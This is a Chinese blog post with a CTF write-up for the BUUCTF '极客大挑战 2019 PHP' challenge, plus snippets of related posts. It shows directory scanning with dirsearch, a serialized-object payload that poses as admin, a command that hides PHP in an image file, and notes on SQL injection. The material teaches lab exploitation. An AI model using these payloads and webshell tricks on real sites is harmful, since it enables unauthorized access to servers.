[极客大挑战 2019]PHP1

于 2024-07-31 21:46:42 发布
阅读量1.1k 收藏 2
点赞数 3
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kw741951/article/details/140833069
版权

打开题目

游戏界面

猜测php里面有文件,我们可以用dirsearch 扫描一下这个服务器

执行命令

dirsearch -u http://2999dfd5-1d43-4a81-a088-9e41c9dccab4.node4.buuoj.cn/ -e php > test.log

最后在log文件中找到一个 200 www.zip

浏览器输入payload下载下来

得到目录文件

解读一下php代码,进行反序列化

payload

?select=O:4:“Name”:3:{s:14:" Name username";s:5:“admin”;s:14:" Name password";i:100;}

但是发现这个里面有空格,所以把空格url编码变成%00再传参

Payload:

/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

worker..
关注
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 7337
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
2025.2.11——一、[极客挑战 2019]PHP wakeup绕过|备份文件|代码审计
最新发布
2402_87387800的博客
02-11 1082
题目来源:BUUCTF [极客挑战 2019]PHP
[极客挑战 2019]PHP 1
cainiao17441898的博客
05-03 507
[极客挑战 2019]PHP 前言 这题主要考察序列化与反序列化,还有其中的__wakeup(),sleep()函数。使用方法 打开题目,查看源码,都是些js,css文件没有什么有用的信息。 用dirsearch爆破下目录,发现有一个www.zip文件。在URL中加上/www.zip 下载下来之后打开发现有个flag.php但是粘贴过去发现错了。那就再看看另外两个文件。 发现需要传入的变量是select,并且username=‘admin’ password=100;接受到数据后会进行序列化。 那就求出
[网络安全 CTF] BUUCTF极客挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客挑战 2019]php
2401_84971538的博客
05-13 762
自我介绍一下,小编13年上海交毕业,曾经在小公司待过,也去过华为、OPPO等厂,18年进入阿里一直到现在。深知多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 832
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
[极客挑战 2019]PHP 1——php反序列化
weixin_51325053的博客
09-12 580
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行。在反序列化时,当前属性个数于实际属性个数时,就会跳过__wakeup(),去执行__destruct。于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
极客挑战 2019 PHP
01-03
### 极客挑战 2019 PHP 比赛详情 #### 文件上传与图片马利用 在极客挑战2019中,存在一道涉及文件上传漏洞的题目。攻击者可以通过特定技术手段绕过服务器端的安全检查机制来实现恶意代码的上传并执行。具体来说,通过文件头及文件内容检测的方式,将后缀名为`.jpg`的文件成功上传至服务器[^3]。 为了进一步提升攻击效果,还可以采用DOS命令组合不同类型的文件创建所谓的“图片马”。例如使用如下命令: ```bash copy 1.jpg/a+php.php/b php.jpg ``` 此操作会把一张正常图像文件同包含PHP脚本的内容合并成一个新的复合文件,在某些配置不当的服务环境中能够被执行从而达到远程控制的目的。经过测试确认,除了常见的`.php`扩展名外,像`.phtml`这样的变种同样会被解释器识别处理。 #### SQL注入技巧探讨 另一类值得关注的是关于SQL注入方面的考察点。对于可能存在此类风险的应用程序接口而言,了解如何根据返回错误提示推测数据库查询结构是一项重要技能。当面对含有多个参数的情况时,则需尝试分别提交诸如整数、字符串等形式的数据片段去观察响应变化规律,进而推断出完整的SQL表达式构成模式[^4]。 ```sql SELECT * FROM users WHERE id = '1' AND username='admin' ``` 上述例子展示了基本形式下的条件拼接逻辑;而在实际竞赛场景里,选手们往往要应对更复杂多样的情形,比如嵌套子查询或者联合查询等高级语法应用场合下所引发的各种异常状况分析工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值